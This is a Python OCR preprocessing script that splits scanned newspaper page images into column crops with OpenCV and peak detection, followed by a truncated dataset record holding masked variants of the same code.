cv2.imwrite('./ocr/test_images/contours/' + basename + 'dilated.jpg',
test_img)
"""
for r in range(0, 40, 5):
name = 'rank=' + str(r) + ".jpg"
path = './ocr/test_images/' + name
new_img = ndimage.rank_filter(test_img, rank=r, size=20)
print("writing " + name)
cv2.imwrite(path, new_img)
"""
if __name__ == '__main__':
print('STARTING')
for f in os.listdir('./ocr/data/gb19gw39h/'):
if f.endswith('.jpg'):
createColumnImages(cv2.imread(os.path.join(
'./ocr/data/gb19gw39h/', f)), 'gb19gw39h-' + f[0],
'./ocr/columns/gb19gw39h/')
for f in os.listdir('./ocr/data/8k71pf94q/'):
if f.endswith('.jpg'):
createColumnImages(cv2.imread(os.path.join(
'./ocr/data/8k71pf94q/', f)), '8k71pf94q-' + f[0],
'./ocr/columns/8k71pf94q/')
for f in os.listdir('./ocr/data/mc87rq85m/'):
if f.endswith('.jpg'):
createColumnImages(cv2.imread(os.path.join(
'./ocr/data/mc87rq85m/', f)), 'mc87rq85m-' + f[0],
'./ocr/columns/mc87rq85m/')
"""
data_folder = './ocr/data/'
for folder in os.listdir(data_folder):
if folder == ".DS_Store":
continue
for file in os.listdir(os.path.join(data_folder, folder)):
if file.endswith(".jpg"):
print("calling test() on " + file)
#test(cv2.imread(os.path.join(data_folder, folder, file)),folder+'-'+file[0])
createColumnImages(cv2.imread(os.path.join(data_folder, folder, file)), folder+'-'+file[0], './ocr/columns/'+folder+'/')
for f in os.listdir('./ocr/data/8k71pr786/'):
if f.endswith(".jpg"):
for d in range(550, 850, 50):
createColumnImages(cv2.imread(os.path.join('./ocr/data/8k71pr786/', f)), '8k71pr786-'+f[0]+'-d=' + str(d), './ocr/test_images/test_contour/8k71pr786/', d)
#createColumnImages(cv2.imread('./ocr/data/8k71pr786/'), 'tester2', './ocr/data/columns/tester/')
"""
<|reserved_special_token_1|>
# https://github.com/jscancella/NYTribuneOCRExperiments/blob/master/findText_usingSums.py
import os
import io
from pathlib import Path
import sys
os.environ['OPENCV_IO_ENABLE_JASPER']='True' # has to be set before importing cv2 otherwise it won't read the variable
import numpy as np
import cv2
import subprocess
from multiprocessing import Pool
from scipy.signal import find_peaks, find_peaks_cwt
import scipy.ndimage as ndimage
from IPython.display import Image as KImage
#custom kernel that is used to blend together text in the Y axis
DILATE_KERNEL = np.array([
[0, 0, 0, 0, 1, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0]], dtype=np.uint8)
# Run adaptative thresholding (is slow af compared to not using it in pipeline)
def adaptative_thresholding(img, threshold):
# Load image
I = img
# Convert image to grayscale
gray = cv2.cvtColor(I, cv2.COLOR_BGR2GRAY)
# Original image size
orignrows, origncols = gray.shape
# Windows size
M = int(np.floor(orignrows/16) + 1)
N = int(np.floor(origncols/16) + 1)
# Image border padding related to windows size
Mextend = round(M/2)-1
Nextend = round(N/2)-1
# Padding image
aux =cv2.copyMakeBorder(gray, top=Mextend, bottom=Mextend, left=Nextend,
right=Nextend, borderType=cv2.BORDER_REFLECT)
windows = np.zeros((M,N),np.int32)
# Image integral calculation
imageIntegral = cv2.integral(aux, windows,-1)
# Integral image size
nrows, ncols = imageIntegral.shape
# Memory allocation for cumulative region image
result = np.zeros((orignrows, origncols))
# Image cumulative pixels in windows size calculation
for i in range(nrows-M):
for j in range(ncols-N):
result[i, j] = imageIntegral[i+M, j+N] - imageIntegral[i, j+N]+ imageIntegral[i, j] - imageIntegral[i+M,j]
# Output binary image memory allocation
binar = np.ones((orignrows, origncols), dtype=np.bool)
# Gray image weighted by windows size
graymult = (gray).astype('float64')*M*N
# Output image binarization
binar[graymult <= result*(100.0 - threshold)/100.0] = False
# binary image to UINT8 conversion
binar = (255*binar).astype(np.uint8)
return binar
def Q_test(sorted_data):
conf95_level = {3: .97, 4: .829, 5: .71, 6: .625, 7: .568, 8: .526, 9: .493}
q_exp = abs(sorted_data[1] - sorted_data[0]) / abs(sorted_data[-1] - sorted_data[0])
print(str(abs(sorted_data[1] - sorted_data[0])) + ' / ' + str(abs(sorted_data[-1] - sorted_data[0])))
print("q_exp : " + str(q_exp))
return q_exp > conf95_level[min(9, len(sorted_data))]
# static variables for clarity
COLUMNS = 0
GREEN = (0, 255, 0)
# parameters that can be tweaked
LINE_THICKNESS = 3 # how thick to make the line around the found contours in the debug output
PADDING = 10 # padding to add around the found possible column to help account for image skew and such
CREATE_COLUMN_OUTLINE_IMAGES = True # if we detect that we didn't find all the columns. Create a debug image (tiff) showing the columns that were found
def columnIndexes(a):
"""
creates pair of indexes for left and right index of the image column
For example [13, 1257, 2474, 3695, 4907, 6149]
becomes: [[13 1257], [1257 2474], [2474 3695], [3695 4907], [4907 6149]]
"""
nrows = (a.size-2)+1
return a[1*np.arange(nrows)[:,None] + np.arange(2)]
def convertToGrayscale(img):
temp_img = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)
return temp_img
def invert(img):
""" Black -> White | White -> Black """
print("invert image")
# Should we edit these parameters?
#3/18/21 - experimented on threshold, 140 is good.
_,temp_img = cv2.threshold(img, 140, 255, cv2.THRESH_BINARY_INV)
return temp_img
def dilateDirection(img, debug=False):
"""
It is just opposite of erosion. Here, a pixel element is '1' if atleast one pixel under the kernel is '1'.
So it increases the white region in the image or size of foreground object increases.
Normally, in cases like noise removal, erosion is followed by dilation.
Because, erosion removes white noises, but it also shrinks our object.
So we dilate it. Since noise is gone, they won't come back, but our object area increases.
It is also useful in joining broken parts of an object.
"""
print("applying dilation morph")
temp_img = cv2.dilate(img, DILATE_KERNEL, iterations=15) #the more iterations the more the text gets stretched in the Y axis, 15 seems about right.
'''
if debug:
filepath = os.path.join(debugOutputDirectory, '%s-dilation.tiff' % basename)
cv2.imwrite(filepath, temp_img)
'''
return temp_img
def createColumnImages(img, basename, directory):
"""
we sum each column of the inverted image. The columns should show up as peaks in the sums
uses scipy.signal.find_peaks to find those peaks and use them as column indexes
"""
files = []
temp_img = convertToGrayscale(img)
temp_img = invert(temp_img)
temp_img = dilateDirection(temp_img)
sums = np.sum(temp_img, axis = COLUMNS)
sums[0] = 1000 # some random value so that find_peaks properly detects the peak for the left most column
sums = sums * -4 # invert so that minimums become maximums and exagerate the data so it is more clear what the peaks are
peaks, _ = find_peaks(sums, distance=600) # the column indexs of the img array, spaced at least 800 away from the previous peak
sum_to_index = dict((sums[peaks[i]], peaks[i]) for i in range(len(peaks)))
sorted_sums = sorted(sum_to_index.keys())
'''
qr = Q_test(sorted_sums)
if qr:
peaks = peaks[peaks != sum_to_index[sorted_sums[0]]]
'''
print("PeakNum, Sum, QRemove for " + basename)
for x in peaks:
print(str(x) + ', ' + str(sums[x]))
print("----------")
if peaks.size == 0:
with open('troublesomeImages.txt', 'a') as f:
print("ERROR: something went wrong with finding the peaks for image: ", os.path.join(directory, basename))
f.write(os.path.join(directory, basename) + ".jpg 0\n")
return files
peaks[0] = 0 # automatically make the left most column index the start of the image
peaks[-1] =sums.size -1 # automatically make the right most column index the end of the image
boxed = np.copy(img)
if peaks.size < 6:
with open('troublesomeImages.txt', 'a') as f:
print("found image that is causing problems: ", os.path.join(directory, basename))
f.write(os.path.join(directory, basename) + ".jpg " + str(peaks.size) + "\n")
columnIndexPairs = columnIndexes(peaks)
ystart = 0
yend = img.shape[0]
for columnIndexPair in columnIndexPairs:
xstart = max(columnIndexPair[0]-PADDING, 0)
xend = min(columnIndexPair[1]+PADDING, img.shape[1])
if not os.path.exists(directory):
os.makedirs(directory)
filepath = os.path.join(directory, '%s_xStart%s_xEnd%s.jpg' % (basename, xstart,xend))
files.append(filepath)
crop_img = img[ystart:yend, xstart:xend]
print("writing out cropped image: ", filepath)
# Apply adaptative thresholding to the image with a threshold of 25/100
#crop_img = adaptative_thresholding(crop_img, 25)
if not cv2.imwrite(filepath, crop_img):
print('failed')
if CREATE_COLUMN_OUTLINE_IMAGES:
cv2.rectangle(boxed,(xstart,ystart),(xend,yend), GREEN, LINE_THICKNESS)
if CREATE_COLUMN_OUTLINE_IMAGES:
filepath = os.path.join(directory, '%s-contours.jpeg' % basename)
cv2.imwrite(filepath, boxed, [cv2.IMWRITE_JPEG_QUALITY, 50])
# For removing the old image?
# os.remove(os.path.join(directory, basename + ".jp2"))
return files
def invert_experiment():
test_img = cv2.imread('./ocr/data/8k71pf94q/1_commonwealth_8k71pf94q_accessFull.jpg')
for thresh in range(1, 200, 20):
print('writing thresh= ' + str(thresh))
_,temp_img = cv2.threshold(test_img, thresh, 255, cv2.THRESH_BINARY_INV)
cv2.imwrite('./ocr/test_images/thresh='+str(thresh)+'.jpg', temp_img)
def test(img, basename):
#h, w, _ = img.shape
#test_img = cv2.imread('./ocr/data/8k71pf94q/2_commonwealth_8k71pf94q_accessFull.jpg')
test_img = convertToGrayscale(img)
#ret,test_img = cv2.threshold(test_img,25,255,0)
#cv2.imwrite('./ocr/test_images/contours/'+basename+'prepixelcrop.jpg', test_img)
#test_img = test_img[10:h-10, 10: w-10]
#y_nonzero, x_nonzero = np.nonzero(test_img)
#test_img = test_img[np.min(y_nonzero):np.max(y_nonzero), np.min(x_nonzero):np.max(x_nonzero)]
test_img = invert(test_img)
test_img = dilateDirection(test_img)
#contours,hierarchy = cv2.findContours(test_img,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)
#cnt = contours[0]
#x,y,w,h = cv2.boundingRect(cnt)
#test_img = cv2.rectangle(img,(10,10),(w-10, h-10), GREEN, LINE_THICKNESS)
#test_img = cv2.drawContours(test_img, contours, -1, GREEN, LINE_THICKNESS)
#crop = test_img[y:y+h,x:x+w]
cv2.imwrite('./ocr/test_images/contours/'+basename+'dilated.jpg', test_img)
'''
for r in range(0, 40, 5):
name = 'rank=' + str(r) + ".jpg"
path = './ocr/test_images/' + name
new_img = ndimage.rank_filter(test_img, rank=r, size=20)
print("writing " + name)
cv2.imwrite(path, new_img)
'''
#cv2.imwrite('./ocr/test_images/inverted.jpg', test_img)
if __name__ == "__main__":
print("STARTING")
for f in os.listdir('./ocr/data/gb19gw39h/'):
if f.endswith(".jpg"):
#test(cv2.imread(os.path.join('./ocr/data/gb19gw39h/', f)), 'gb19gw39h-' + f[0])
createColumnImages(cv2.imread(os.path.join('./ocr/data/gb19gw39h/', f)), 'gb19gw39h-' + f[0], './ocr/columns/gb19gw39h/')
for f in os.listdir('./ocr/data/8k71pf94q/'):
if f.endswith(".jpg"):
#test(cv2.imread(os.path.join('./ocr/data/gb19gw39h/', f)), 'gb19gw39h-' + f[0])
createColumnImages(cv2.imread(os.path.join('./ocr/data/8k71pf94q/', f)), '8k71pf94q-' + f[0], './ocr/columns/8k71pf94q/')
for f in os.listdir('./ocr/data/mc87rq85m/'):
if f.endswith(".jpg"):
#test(cv2.imread(os.path.join('./ocr/data/gb19gw39h/', f)), 'gb19gw39h-' + f[0])
createColumnImages(cv2.imread(os.path.join('./ocr/data/mc87rq85m/', f)), 'mc87rq85m-' + f[0], './ocr/columns/mc87rq85m/')
'''
data_folder = './ocr/data/'
for folder in os.listdir(data_folder):
if folder == ".DS_Store":
continue
for file in os.listdir(os.path.join(data_folder, folder)):
if file.endswith(".jpg"):
print("calling test() on " + file)
#test(cv2.imread(os.path.join(data_folder, folder, file)),folder+'-'+file[0])
createColumnImages(cv2.imread(os.path.join(data_folder, folder, file)), folder+'-'+file[0], './ocr/columns/'+folder+'/')
for f in os.listdir('./ocr/data/8k71pr786/'):
if f.endswith(".jpg"):
for d in range(550, 850, 50):
createColumnImages(cv2.imread(os.path.join('./ocr/data/8k71pr786/', f)), '8k71pr786-'+f[0]+'-d=' + str(d), './ocr/test_images/test_contour/8k71pr786/', d)
#createColumnImages(cv2.imread('./ocr/data/8k71pr786/'), 'tester2', './ocr/data/columns/tester/')
'''
|
flexible
|
{
"blob_id": "91d240b02b9d7a6c569656337521482d57918754",
"index": 4333,
"step-1": "<mask token>\n\n\ndef adaptative_thresholding(img, threshold):\n I = img\n gray = cv2.cvtColor(I, cv2.COLOR_BGR2GRAY)\n orignrows, origncols = gray.shape\n M = int(np.floor(orignrows / 16) + 1)\n N = int(np.floor(origncols / 16) + 1)\n Mextend = round(M / 2) - 1\n Nextend = round(N / 2) - 1\n aux = cv2.copyMakeBorder(gray, top=Mextend, bottom=Mextend, left=\n Nextend, right=Nextend, borderType=cv2.BORDER_REFLECT)\n windows = np.zeros((M, N), np.int32)\n imageIntegral = cv2.integral(aux, windows, -1)\n nrows, ncols = imageIntegral.shape\n result = np.zeros((orignrows, origncols))\n for i in range(nrows - M):\n for j in range(ncols - N):\n result[i, j] = imageIntegral[i + M, j + N] - imageIntegral[i, j + N\n ] + imageIntegral[i, j] - imageIntegral[i + M, j]\n binar = np.ones((orignrows, origncols), dtype=np.bool)\n graymult = gray.astype('float64') * M * N\n binar[graymult <= result * (100.0 - threshold) / 100.0] = False\n binar = (255 * binar).astype(np.uint8)\n return binar\n\n\n<mask token>\n\n\ndef convertToGrayscale(img):\n temp_img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n return temp_img\n\n\ndef invert(img):\n \"\"\" Black -> White | White -> Black \"\"\"\n print('invert image')\n _, temp_img = cv2.threshold(img, 140, 255, cv2.THRESH_BINARY_INV)\n return temp_img\n\n\ndef dilateDirection(img, debug=False):\n \"\"\"\n It is just opposite of erosion. Here, a pixel element is '1' if atleast one pixel under the kernel is '1'. \n So it increases the white region in the image or size of foreground object increases. \n Normally, in cases like noise removal, erosion is followed by dilation. \n Because, erosion removes white noises, but it also shrinks our object. \n So we dilate it. Since noise is gone, they won't come back, but our object area increases. \n It is also useful in joining broken parts of an object. \n \"\"\"\n print('applying dilation morph')\n temp_img = cv2.dilate(img, DILATE_KERNEL, iterations=15)\n \"\"\"\n if debug:\n filepath = os.path.join(debugOutputDirectory, '%s-dilation.tiff' % basename)\n cv2.imwrite(filepath, temp_img)\n \"\"\"\n return temp_img\n\n\ndef createColumnImages(img, basename, directory):\n \"\"\"\n we sum each column of the inverted image. The columns should show up as peaks in the sums\n uses scipy.signal.find_peaks to find those peaks and use them as column indexes\n \"\"\"\n files = []\n temp_img = convertToGrayscale(img)\n temp_img = invert(temp_img)\n temp_img = dilateDirection(temp_img)\n sums = np.sum(temp_img, axis=COLUMNS)\n sums[0] = 1000\n sums = sums * -4\n peaks, _ = find_peaks(sums, distance=600)\n sum_to_index = dict((sums[peaks[i]], peaks[i]) for i in range(len(peaks)))\n sorted_sums = sorted(sum_to_index.keys())\n \"\"\"\n qr = Q_test(sorted_sums)\n if qr:\n peaks = peaks[peaks != sum_to_index[sorted_sums[0]]]\n \"\"\"\n print('PeakNum, Sum, QRemove for ' + basename)\n for x in peaks:\n print(str(x) + ', ' + str(sums[x]))\n print('----------')\n if peaks.size == 0:\n with open('troublesomeImages.txt', 'a') as f:\n print(\n 'ERROR: something went wrong with finding the peaks for image: '\n , os.path.join(directory, basename))\n f.write(os.path.join(directory, basename) + '.jpg 0\\n')\n return files\n peaks[0] = 0\n peaks[-1] = sums.size - 1\n boxed = np.copy(img)\n if peaks.size < 6:\n with open('troublesomeImages.txt', 'a') as f:\n print('found image that is causing problems: ', os.path.join(\n directory, basename))\n f.write(os.path.join(directory, basename) + '.jpg ' + str(peaks\n .size) + '\\n')\n columnIndexPairs = columnIndexes(peaks)\n ystart = 0\n yend = img.shape[0]\n for columnIndexPair in columnIndexPairs:\n xstart = max(columnIndexPair[0] - PADDING, 0)\n xend = min(columnIndexPair[1] + PADDING, img.shape[1])\n if not os.path.exists(directory):\n os.makedirs(directory)\n filepath = os.path.join(directory, '%s_xStart%s_xEnd%s.jpg' % (\n basename, xstart, xend))\n files.append(filepath)\n crop_img = img[ystart:yend, xstart:xend]\n print('writing out cropped image: ', filepath)\n if not cv2.imwrite(filepath, crop_img):\n print('failed')\n if CREATE_COLUMN_OUTLINE_IMAGES:\n cv2.rectangle(boxed, (xstart, ystart), (xend, yend), GREEN,\n LINE_THICKNESS)\n if CREATE_COLUMN_OUTLINE_IMAGES:\n filepath = os.path.join(directory, '%s-contours.jpeg' % basename)\n cv2.imwrite(filepath, boxed, [cv2.IMWRITE_JPEG_QUALITY, 50])\n return files\n\n\n<mask token>\n\n\ndef test(img, basename):\n test_img = convertToGrayscale(img)\n test_img = invert(test_img)\n test_img = dilateDirection(test_img)\n cv2.imwrite('./ocr/test_images/contours/' + basename + 'dilated.jpg',\n test_img)\n \"\"\"\n for r in range(0, 40, 5):\n name = 'rank=' + str(r) + \".jpg\"\n path = './ocr/test_images/' + name\n\n new_img = ndimage.rank_filter(test_img, rank=r, size=20)\n print(\"writing \" + name)\n cv2.imwrite(path, new_img)\n \"\"\"\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef adaptative_thresholding(img, threshold):\n I = img\n gray = cv2.cvtColor(I, cv2.COLOR_BGR2GRAY)\n orignrows, origncols = gray.shape\n M = int(np.floor(orignrows / 16) + 1)\n N = int(np.floor(origncols / 16) + 1)\n Mextend = round(M / 2) - 1\n Nextend = round(N / 2) - 1\n aux = cv2.copyMakeBorder(gray, top=Mextend, bottom=Mextend, left=\n Nextend, right=Nextend, borderType=cv2.BORDER_REFLECT)\n windows = np.zeros((M, N), np.int32)\n imageIntegral = cv2.integral(aux, windows, -1)\n nrows, ncols = imageIntegral.shape\n result = np.zeros((orignrows, origncols))\n for i in range(nrows - M):\n for j in range(ncols - N):\n result[i, j] = imageIntegral[i + M, j + N] - imageIntegral[i, j + N\n ] + imageIntegral[i, j] - imageIntegral[i + M, j]\n binar = np.ones((orignrows, origncols), dtype=np.bool)\n graymult = gray.astype('float64') * M * N\n binar[graymult <= result * (100.0 - threshold) / 100.0] = False\n binar = (255 * binar).astype(np.uint8)\n return binar\n\n\n<mask token>\n\n\ndef convertToGrayscale(img):\n temp_img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n return temp_img\n\n\ndef invert(img):\n \"\"\" Black -> White | White -> Black \"\"\"\n print('invert image')\n _, temp_img = cv2.threshold(img, 140, 255, cv2.THRESH_BINARY_INV)\n return temp_img\n\n\ndef dilateDirection(img, debug=False):\n \"\"\"\n It is just opposite of erosion. Here, a pixel element is '1' if atleast one pixel under the kernel is '1'. \n So it increases the white region in the image or size of foreground object increases. \n Normally, in cases like noise removal, erosion is followed by dilation. \n Because, erosion removes white noises, but it also shrinks our object. \n So we dilate it. Since noise is gone, they won't come back, but our object area increases. \n It is also useful in joining broken parts of an object. \n \"\"\"\n print('applying dilation morph')\n temp_img = cv2.dilate(img, DILATE_KERNEL, iterations=15)\n \"\"\"\n if debug:\n filepath = os.path.join(debugOutputDirectory, '%s-dilation.tiff' % basename)\n cv2.imwrite(filepath, temp_img)\n \"\"\"\n return temp_img\n\n\ndef createColumnImages(img, basename, directory):\n \"\"\"\n we sum each column of the inverted image. The columns should show up as peaks in the sums\n uses scipy.signal.find_peaks to find those peaks and use them as column indexes\n \"\"\"\n files = []\n temp_img = convertToGrayscale(img)\n temp_img = invert(temp_img)\n temp_img = dilateDirection(temp_img)\n sums = np.sum(temp_img, axis=COLUMNS)\n sums[0] = 1000\n sums = sums * -4\n peaks, _ = find_peaks(sums, distance=600)\n sum_to_index = dict((sums[peaks[i]], peaks[i]) for i in range(len(peaks)))\n sorted_sums = sorted(sum_to_index.keys())\n \"\"\"\n qr = Q_test(sorted_sums)\n if qr:\n peaks = peaks[peaks != sum_to_index[sorted_sums[0]]]\n \"\"\"\n print('PeakNum, Sum, QRemove for ' + basename)\n for x in peaks:\n print(str(x) + ', ' + str(sums[x]))\n print('----------')\n if peaks.size == 0:\n with open('troublesomeImages.txt', 'a') as f:\n print(\n 'ERROR: something went wrong with finding the peaks for image: '\n , os.path.join(directory, basename))\n f.write(os.path.join(directory, basename) + '.jpg 0\\n')\n return files\n peaks[0] = 0\n peaks[-1] = sums.size - 1\n boxed = np.copy(img)\n if peaks.size < 6:\n with open('troublesomeImages.txt', 'a') as f:\n print('found image that is causing problems: ', os.path.join(\n directory, basename))\n f.write(os.path.join(directory, basename) + '.jpg ' + str(peaks\n .size) + '\\n')\n columnIndexPairs = columnIndexes(peaks)\n ystart = 0\n yend = img.shape[0]\n for columnIndexPair in columnIndexPairs:\n xstart = max(columnIndexPair[0] - PADDING, 0)\n xend = min(columnIndexPair[1] + PADDING, img.shape[1])\n if not os.path.exists(directory):\n os.makedirs(directory)\n filepath = os.path.join(directory, '%s_xStart%s_xEnd%s.jpg' % (\n basename, xstart, xend))\n files.append(filepath)\n crop_img = img[ystart:yend, xstart:xend]\n print('writing out cropped image: ', filepath)\n if not cv2.imwrite(filepath, crop_img):\n print('failed')\n if CREATE_COLUMN_OUTLINE_IMAGES:\n cv2.rectangle(boxed, (xstart, ystart), (xend, yend), GREEN,\n LINE_THICKNESS)\n if CREATE_COLUMN_OUTLINE_IMAGES:\n filepath = os.path.join(directory, '%s-contours.jpeg' % basename)\n cv2.imwrite(filepath, boxed, [cv2.IMWRITE_JPEG_QUALITY, 50])\n return files\n\n\ndef invert_experiment():\n test_img = cv2.imread(\n './ocr/data/8k71pf94q/1_commonwealth_8k71pf94q_accessFull.jpg')\n for thresh in range(1, 200, 20):\n print('writing thresh= ' + str(thresh))\n _, temp_img = cv2.threshold(test_img, thresh, 255, cv2.\n THRESH_BINARY_INV)\n cv2.imwrite('./ocr/test_images/thresh=' + str(thresh) + '.jpg',\n temp_img)\n\n\ndef test(img, basename):\n test_img = convertToGrayscale(img)\n test_img = invert(test_img)\n test_img = dilateDirection(test_img)\n cv2.imwrite('./ocr/test_images/contours/' + basename + 'dilated.jpg',\n test_img)\n \"\"\"\n for r in range(0, 40, 5):\n name = 'rank=' + str(r) + \".jpg\"\n path = './ocr/test_images/' + name\n\n new_img = ndimage.rank_filter(test_img, rank=r, size=20)\n print(\"writing \" + name)\n cv2.imwrite(path, new_img)\n \"\"\"\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef adaptative_thresholding(img, threshold):\n I = img\n gray = cv2.cvtColor(I, cv2.COLOR_BGR2GRAY)\n orignrows, origncols = gray.shape\n M = int(np.floor(orignrows / 16) + 1)\n N = int(np.floor(origncols / 16) + 1)\n Mextend = round(M / 2) - 1\n Nextend = round(N / 2) - 1\n aux = cv2.copyMakeBorder(gray, top=Mextend, bottom=Mextend, left=\n Nextend, right=Nextend, borderType=cv2.BORDER_REFLECT)\n windows = np.zeros((M, N), np.int32)\n imageIntegral = cv2.integral(aux, windows, -1)\n nrows, ncols = imageIntegral.shape\n result = np.zeros((orignrows, origncols))\n for i in range(nrows - M):\n for j in range(ncols - N):\n result[i, j] = imageIntegral[i + M, j + N] - imageIntegral[i, j + N\n ] + imageIntegral[i, j] - imageIntegral[i + M, j]\n binar = np.ones((orignrows, origncols), dtype=np.bool)\n graymult = gray.astype('float64') * M * N\n binar[graymult <= result * (100.0 - threshold) / 100.0] = False\n binar = (255 * binar).astype(np.uint8)\n return binar\n\n\n<mask token>\n\n\ndef columnIndexes(a):\n \"\"\"\n creates pair of indexes for left and right index of the image column\n For example [13, 1257, 2474, 3695, 4907, 6149]\n becomes: [[13 1257], [1257 2474], [2474 3695], [3695 4907], [4907 6149]]\n \"\"\"\n nrows = a.size - 2 + 1\n return a[1 * np.arange(nrows)[:, None] + np.arange(2)]\n\n\ndef convertToGrayscale(img):\n temp_img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n return temp_img\n\n\ndef invert(img):\n \"\"\" Black -> White | White -> Black \"\"\"\n print('invert image')\n _, temp_img = cv2.threshold(img, 140, 255, cv2.THRESH_BINARY_INV)\n return temp_img\n\n\ndef dilateDirection(img, debug=False):\n \"\"\"\n It is just opposite of erosion. Here, a pixel element is '1' if atleast one pixel under the kernel is '1'. \n So it increases the white region in the image or size of foreground object increases. \n Normally, in cases like noise removal, erosion is followed by dilation. \n Because, erosion removes white noises, but it also shrinks our object. \n So we dilate it. Since noise is gone, they won't come back, but our object area increases. \n It is also useful in joining broken parts of an object. \n \"\"\"\n print('applying dilation morph')\n temp_img = cv2.dilate(img, DILATE_KERNEL, iterations=15)\n \"\"\"\n if debug:\n filepath = os.path.join(debugOutputDirectory, '%s-dilation.tiff' % basename)\n cv2.imwrite(filepath, temp_img)\n \"\"\"\n return temp_img\n\n\ndef createColumnImages(img, basename, directory):\n \"\"\"\n we sum each column of the inverted image. The columns should show up as peaks in the sums\n uses scipy.signal.find_peaks to find those peaks and use them as column indexes\n \"\"\"\n files = []\n temp_img = convertToGrayscale(img)\n temp_img = invert(temp_img)\n temp_img = dilateDirection(temp_img)\n sums = np.sum(temp_img, axis=COLUMNS)\n sums[0] = 1000\n sums = sums * -4\n peaks, _ = find_peaks(sums, distance=600)\n sum_to_index = dict((sums[peaks[i]], peaks[i]) for i in range(len(peaks)))\n sorted_sums = sorted(sum_to_index.keys())\n \"\"\"\n qr = Q_test(sorted_sums)\n if qr:\n peaks = peaks[peaks != sum_to_index[sorted_sums[0]]]\n \"\"\"\n print('PeakNum, Sum, QRemove for ' + basename)\n for x in peaks:\n print(str(x) + ', ' + str(sums[x]))\n print('----------')\n if peaks.size == 0:\n with open('troublesomeImages.txt', 'a') as f:\n print(\n 'ERROR: something went wrong with finding the peaks for image: '\n , os.path.join(directory, basename))\n f.write(os.path.join(directory, basename) + '.jpg 0\\n')\n return files\n peaks[0] = 0\n peaks[-1] = sums.size - 1\n boxed = np.copy(img)\n if peaks.size < 6:\n with open('troublesomeImages.txt', 'a') as f:\n print('found image that is causing problems: ', os.path.join(\n directory, basename))\n f.write(os.path.join(directory, basename) + '.jpg ' + str(peaks\n .size) + '\\n')\n columnIndexPairs = columnIndexes(peaks)\n ystart = 0\n yend = img.shape[0]\n for columnIndexPair in columnIndexPairs:\n xstart = max(columnIndexPair[0] - PADDING, 0)\n xend = min(columnIndexPair[1] + PADDING, img.shape[1])\n if not os.path.exists(directory):\n os.makedirs(directory)\n filepath = os.path.join(directory, '%s_xStart%s_xEnd%s.jpg' % (\n basename, xstart, xend))\n files.append(filepath)\n crop_img = img[ystart:yend, xstart:xend]\n print('writing out cropped image: ', filepath)\n if not cv2.imwrite(filepath, crop_img):\n print('failed')\n if CREATE_COLUMN_OUTLINE_IMAGES:\n cv2.rectangle(boxed, (xstart, ystart), (xend, yend), GREEN,\n LINE_THICKNESS)\n if CREATE_COLUMN_OUTLINE_IMAGES:\n filepath = os.path.join(directory, '%s-contours.jpeg' % basename)\n cv2.imwrite(filepath, boxed, [cv2.IMWRITE_JPEG_QUALITY, 50])\n return files\n\n\ndef invert_experiment():\n test_img = cv2.imread(\n './ocr/data/8k71pf94q/1_commonwealth_8k71pf94q_accessFull.jpg')\n for thresh in range(1, 200, 20):\n print('writing thresh= ' + str(thresh))\n _, temp_img = cv2.threshold(test_img, thresh, 255, cv2.\n THRESH_BINARY_INV)\n cv2.imwrite('./ocr/test_images/thresh=' + str(thresh) + '.jpg',\n temp_img)\n\n\ndef test(img, basename):\n test_img = convertToGrayscale(img)\n test_img = invert(test_img)\n test_img = dilateDirection(test_img)\n cv2.imwrite('./ocr/test_images/contours/' + basename + 'dilated.jpg',\n test_img)\n \"\"\"\n for r in range(0, 40, 5):\n name = 'rank=' + str(r) + \".jpg\"\n path = './ocr/test_images/' + name\n\n new_img = ndimage.rank_filter(test_img, rank=r, size=20)\n print(\"writing \" + name)\n cv2.imwrite(path, new_img)\n \"\"\"\n\n\n<mask token>\n",
"step-4": "<mask token>\nos.environ['OPENCV_IO_ENABLE_JASPER'] = 'True'\n<mask token>\nDILATE_KERNEL = np.array([[0, 0, 0, 0, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0,\n 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0], [0, 0,\n 0, 0, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0,\n 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0]], dtype\n =np.uint8)\n\n\ndef adaptative_thresholding(img, threshold):\n I = img\n gray = cv2.cvtColor(I, cv2.COLOR_BGR2GRAY)\n orignrows, origncols = gray.shape\n M = int(np.floor(orignrows / 16) + 1)\n N = int(np.floor(origncols / 16) + 1)\n Mextend = round(M / 2) - 1\n Nextend = round(N / 2) - 1\n aux = cv2.copyMakeBorder(gray, top=Mextend, bottom=Mextend, left=\n Nextend, right=Nextend, borderType=cv2.BORDER_REFLECT)\n windows = np.zeros((M, N), np.int32)\n imageIntegral = cv2.integral(aux, windows, -1)\n nrows, ncols = imageIntegral.shape\n result = np.zeros((orignrows, origncols))\n for i in range(nrows - M):\n for j in range(ncols - N):\n result[i, j] = imageIntegral[i + M, j + N] - imageIntegral[i, j + N\n ] + imageIntegral[i, j] - imageIntegral[i + M, j]\n binar = np.ones((orignrows, origncols), dtype=np.bool)\n graymult = gray.astype('float64') * M * N\n binar[graymult <= result * (100.0 - threshold) / 100.0] = False\n binar = (255 * binar).astype(np.uint8)\n return binar\n\n\ndef Q_test(sorted_data):\n conf95_level = {(3): 0.97, (4): 0.829, (5): 0.71, (6): 0.625, (7): \n 0.568, (8): 0.526, (9): 0.493}\n q_exp = abs(sorted_data[1] - sorted_data[0]) / abs(sorted_data[-1] -\n sorted_data[0])\n print(str(abs(sorted_data[1] - sorted_data[0])) + ' / ' + 